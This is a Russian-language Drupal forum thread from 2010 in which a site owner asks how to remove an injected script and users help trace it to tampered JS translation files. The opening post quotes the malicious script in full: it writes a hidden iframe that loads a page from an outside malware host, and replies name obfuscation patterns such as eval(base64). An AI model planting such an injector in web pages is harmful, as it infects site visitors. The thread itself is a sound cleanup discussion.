Помогите избавиться от скрипта [Решено]

Главные вкладки

Аватар пользователя Loda Loda 20 февраля 2010 в 17:23

Несколько дней назад обнаружила в head вот такой скрипт:

<script>
if (document.cookie.search("cdx=7") == -1) {
2ifbt=document.getElementById('kiew');if(ifbt==null){document.write('<iframe id=kiew src=http://www.bulanda.eu/Ged/xmlrpc.php style=display:none></iframe>');}
3document.cookie = "cdx=7;expires=Sun, 01-Dec-2011 08:00:00 GMT;path=/";}
</script>

Ничего в них не понимаю, но его там явно быть не должно. Перелопатила весь сайт, перезалила сам друпал и все модули...все бестолку. Посмотрела в firebug, но именно у этого скрипта нет src или еще каких-то способов определить, откуда он там взялся. Помогите разобраться, пожалуйста

Комментарии

Аватар пользователя Stargazer Stargazer 20 февраля 2010 в 18:13

Меняйте фтпшку и все пассворды. Попробуйте перезалить после тщательной проверки пк все стандартные файлы двигла и модулей

Аватар пользователя Loda Loda 20 февраля 2010 в 18:28

О том и речь, что все это было проделано. Причем дважды... Спрятали куда-то эту заразу хорошо.
Комп не проверяла - у меня линукс.
Грешу все же на стыренный пароль, т.к. приходилось несколько раз работать из под винды...видимо там его и уперли. Но сейчас-то такого не должно быть.
Вопрос в том, КУДА этот вирус спрятали?

Аватар пользователя Stargazer Stargazer 20 февраля 2010 в 18:32

Может дело в том, что вы из старого дистрибутива восстановили "поправленный" файл? Попробуйте смотреть модули и тему. Возможно ответ кроется ближе, чем кажется

Аватар пользователя Loda Loda 20 февраля 2010 в 18:39

Скачала все с друпал.орг и сразу залила себе, ничего старого нет. Тему вот еще раз проверю, у меня она не "оригинальная".

Аватар пользователя Stargazer Stargazer 20 февраля 2010 в 18:47

А вообще Вам надо искать контейнер(див таблица параграфф и т.д.) с id kiew. Найдете его - найдете корешки.

Хитрость может крыться в другом JS, который при загрузке создает это контейнер, а уже после его выполнения туда другим скриптом встраивается iframe.

Еще стоит искать подозрительный код в виде eval(base64). Туда можно прописать что угодно.. Для анализа потребуется декодер - если поищите внимательнее, то в сети они есть

Аватар пользователя Stargazer Stargazer 20 февраля 2010 в 19:38

Внимание! Посещение этого сайта может нанести вред вашему компьютеру.
Веб-сайт по адресу aguzarova.info содержит элементы сайта какаточкаеу, где, вероятно, размещено вредоносное ПО – программа, которая может нанести вред вашему компьютеру или выполять действия без вашего согласия. Ваш компьютер может быть заражен просто при посещении сайта, на котором размещена вредоносная программа.
Более подробную информацию о неполадках с этими элементами можно найти на странице Google Страница диагностики безопасного просмотра для домена ....

xD

Включите плиз ..

Аватар пользователя Stargazer Stargazer 20 февраля 2010 в 20:08

Зайдите в папку юзерских скриптов фокса. Я не знаю как оно на *nix'ах устроено, но возможно ответ где-то там, ибо у меня со всех браузеров всё чисто. Поискал по скриптам - те что сверху - тоже чисто.

Кстати ... Оно наверное вот оттуда и инклюдится как-то. хттп://www.bуlanдa.eu/Ged/xmlrpc.php
Что у вас на пинге висит? Смотрите внимательнее все внешние связки

Аватар пользователя Loda Loda 20 февраля 2010 в 20:14

Так, это уже сложно для моего чайникового понимания... особенно вторая половина. Можно немного поподробнее?

Аватар пользователя Stargazer Stargazer 20 февраля 2010 в 20:20

Кароче огнепопый лис козырен своими примочками для расширения функционала. Возможно, у Вас стоит какой-то юзерскрипт, который этот фрейм и встраивает.

Пинг это модуль, который через xmlrpc уведомляет другие сайты об обновлении вашего. Я бы в этих двух направлениях копал

Аватар пользователя Loda Loda 20 февраля 2010 в 23:10

Весь вечер курила маны и возникло два вопроса:
- если бы файрфокс что-то встраивал, разве он может это сделать на сервере? Скрипт же не только на моем компе вылезает. Изначально его вообще яндекс нашел.
- с уведомлением других сайтов тоже не очень понятно... Скрипт не исчезает ни на секунду, сколько бы я не перезаливала и сам друпал, и модули. Пароль уже сто раз поменян.

Аватар пользователя Ветер Ветер 21 февраля 2010 в 0:04

Не сохраняйте пароли на ФТП в программах.

Может соседний сайт сломали или весь хостинг, поэтому сколько не перезаливай результат такой же.

Аватар пользователя volocuga volocuga 21 февраля 2010 в 0:19

Насчёт "компьютер точно чистый".Был у меня анекдотичный случай:
Я сидел тогда на 3G,там специальный модем дают.Начал замечать,что сильно жрёт траффика - буквально за несколько дней уходило гига 3,причём всё более исходящий. Проверялся всем чем только мог,включая лицензионный Каспер - антивирусы как-то странно висли, показывали каких-то червей,но сделать ничего не могли. Форматировал винт раз 5, с полной затиркой ноликами винта (есть такая утилита) Эффекта - 0. Опытным путём,при помощи Нортона, удалось выяснить, что рассылается спам. Оказалось, дело было в модеме - там есть флэш память, там и сидел вирус. Купил новый модем Smile

Аватар пользователя Loda Loda 21 февраля 2010 в 1:36

И что бы вы посоветовали чайнику-блондинке? ))
Это наверное дурацкий вопрос, но мне одна небезызвестная особа выносит мозг из-за этого сайта, так что даже остатки соображалки уже не работают ((

Аватар пользователя vldmr vldmr 21 февраля 2010 в 2:37

Могут вставлять скрипт дополнения к браузеру, выключите все дополнения, или переустановите браузер.

Аватар пользователя Loda Loda 21 февраля 2010 в 11:27

У меня по-прежнему тот же вопрос - в какой момент браузер может вставить скрипт? Если я правильно понимаю, то он его может вписать только на моей стороне, то есть в уже загруженную страницу, а не на сервере. Но скрипт то вылезает не только на этом компе... Разве не так? У меня из дополнений только firebug и стоит собственно.

Аватар пользователя Dalay Dalay 21 февраля 2010 в 12:10

А чего о хостинге никто вопрос не поднимает? Все разы, что мне сайты дефейсили и «инфреймили», каждый раз была дыра со стороны хостера, не смотря на все его заявления в обратном.

Аватар пользователя Dalay Dalay 21 февраля 2010 в 14:50

"volocuga" wrote:
Да у хостера всегда отмазка "У меня Unix и вирусов быть не может" :)

На каждого хитрожопого хостера есть логи с правильной резьбой.

Аватар пользователя Loda Loda 21 февраля 2010 в 23:24

На каждого хитрожопого хостера нужен не менее житрожопый клиент. У меня к сожалению данная черта отсутствует (( И в любом случае, прежде чем приставать к хостеру, надо убедиться, что это не с моей стороны проблемы (с головой).

Аватар пользователя Dalay Dalay 22 февраля 2010 в 0:53

"Loda" wrote:
На каждого хитрожопого хостера нужен не менее житрожопый клиент. У меня к сожалению данная черта отсутствует (( И в любом случае, прежде чем приставать к хостеру, надо убедиться, что это не с моей стороны проблемы (с головой).

Так к хостеру можно не только «приставать», а просто обратиться по человечески за помощью. Маловероятно, что на drupal.ru вы на свой вопрос получите исчерпывающий ответ, слишком специфична тема безопасности и ее нарушения.

Аватар пользователя Dalay Dalay 22 февраля 2010 в 13:13

"Loda" wrote:
Вирус нашелся в файлах перевода для скриптов, т.е в каталоге sites/default/files/languages

Ух ты. Smile К чему перевод? Где брали?

И чета я механизма этого подлого действия не пойму. Как парсер PO-файлов мог пропустить тег скрипта? Если пропустил, то это означает большой и грязный камень в лицо безопасности самого двига.

Аватар пользователя Loda Loda 22 февраля 2010 в 13:32

Пардон, я не знаю... Я сразу предупредила, что в кодах почти ничего не понимаю *йа_блондинко*
Все модули и прочее я беру только с друпал.орг (если мне память не изменяет). В принципе ничего экзотического у меня не стоит. RxB объяснил так:

"А хостер реально странный. Не исключено что через него это и было сделано.
В language-файлах должна быть только одна строка, по типу:
Drupal.locale = { 'pluralFormula':....
Ключевое слово Drupal, у вас после был код вида:
var source = 'iuy7iHUI&T&TGOPUJPGJCFTHDYRDIUPILJKPYJDYDUGO8uyp9uj[up9' и т.п
Потом это дело по циклу шло и дешифровывалось.
Потом document.write()
Наличие такой херни, даёт повод для сомнений".

Хостер r01.ru, если это кому-то интересно.

Аватар пользователя Stargazer Stargazer 22 февраля 2010 в 13:50

Ну вообще да, забавно Smile

Прикиньте, если eval(function(p,a,c,k,e,r) или eval(function(p,a,c,k,e,d) ? Там тоже так просто не посмотреть...

Аватар пользователя Stargazer Stargazer 22 февраля 2010 в 13:55

Если пропустил, то это означает большой и грязный камень в лицо безопасности самого двига.

Это скорее угроза более стрёмная и масштабная. Напишу сейчас полезный модуль, засуну в него что-то интересное и половина пользователей даже подозревать ничего не будет. А засунуть реально можно что угодно...

Аватар пользователя Виктор Степаньков ака RxB Виктор Степаньк... 22 февраля 2010 в 14:06

"Stargazer" wrote:
Если пропустил, то это означает большой и грязный камень в лицо безопасности самого двига.

Чего вы кипеш поднимаете? Вроде никто не говорил, что через .po-файлы произошло заражение.
Если включить логическое мышление в тыковке, то получается:
Пришёл злой скрипт, либо через ФТП, либо от соседей, добавил свой код во ВСЕ js-файлы. На сайт начали ругаться антивирусы, это увидела Жанна Агузарова и тоже начала ругаться, но на марсиан. Начала доставать ТС. ТС, взяла и заменила файлы резервной копией, все скрипты кроме динамически-генерируемых, вроде JS-файлов перевода, естественно заменились чистыми.

Аватар пользователя Dalay Dalay 22 февраля 2010 в 14:10

"RxB" wrote:
Чего вы кипеш поднимаете? Вроде никто не говорил, что через .po-файлы произошло заражение.
Если включить логическое мышление в тыковке, то получается:
Пришёл злой скрипт, либо через ФТП, либо от соседей, добавил свой код во ВСЕ js-файлы. На сайт начали ругаться антивирусы, это увидела Жанна Агузарова и тоже начала ругаться, но на марсиан. Начала доставать ТС. ТС, взяла и заменила файлы резервной копией, все скрипты кроме динамически-генерируемых, вроде JS-файлов перевода, естественно заменились чистыми.

Так чего раньше скромничал? Примерно этих объяснений и ждали.

Аватар пользователя Loda Loda 22 февраля 2010 в 14:11

"RxB" wrote:
На сайт начали ругаться антивирусы, это увидела Жанна Агузарова и тоже начала ругаться, но на марсиан.

Не так было ))) Антивирусы молчали, возмущался только яндекс. А Жанна возмущалась, что сайт закрыт, потому что ТС (это звучит гордо)) испугалось, что заразится кто-то из пользователей.
Впрочем это наверное не существенно ))

Аватар пользователя Виктор Степаньков ака RxB Виктор Степаньк... 22 февраля 2010 в 14:14

"Dalay" wrote:
Так чего раньше скромничал? Примерно этих объяснений и ждали.

Потому что в ваше сопле-жуйство влазить не хотел. По расположению вредоносного скрипта было сразу видно откуда он идёт

Аватар пользователя Dalay Dalay 22 февраля 2010 в 14:21

"RxB" wrote:
Потому что в ваше сопле-жуйство влазить не хотел. По расположению вредоносного скрипта было сразу видно откуда он идёт

И в чем причины хамства? Был озвучен конкретный вопрос, на него ожидался конкретный вопрос. Мне дохера чего видно из окна своего, однако ж претензий, что этого не видят другие никому предъявлять не стану. Чего, собсно, и от других ожидаю.

Аватар пользователя Виктор Степаньков ака RxB Виктор Степаньк... 22 февраля 2010 в 14:23

"Stargazer" wrote:
Виктор, я не поднимал кипеш, я всего-лишь констатировал очевидное (:

Это я неудачно квотировал
"Dalay" wrote:
И в чем причины хамства? Был озвучен конкретный вопрос, на него ожидался конкретный вопрос. Мне дохера чего видно из окна своего, однако ж претензий, что этого не видят другие никому предъявлять не стану. Чего, собсно, и от других ожидаю.

Ну вот и продолжай наблюдать, я тебе вроде не мешаю.

Аватар пользователя Dalay Dalay 22 февраля 2010 в 14:26

"RxB" wrote:
Ну вот и продолжай наблюдать, я тебе вроде не мешаю.

Smile Чувак, окстись. Мир лучше, чем кажется.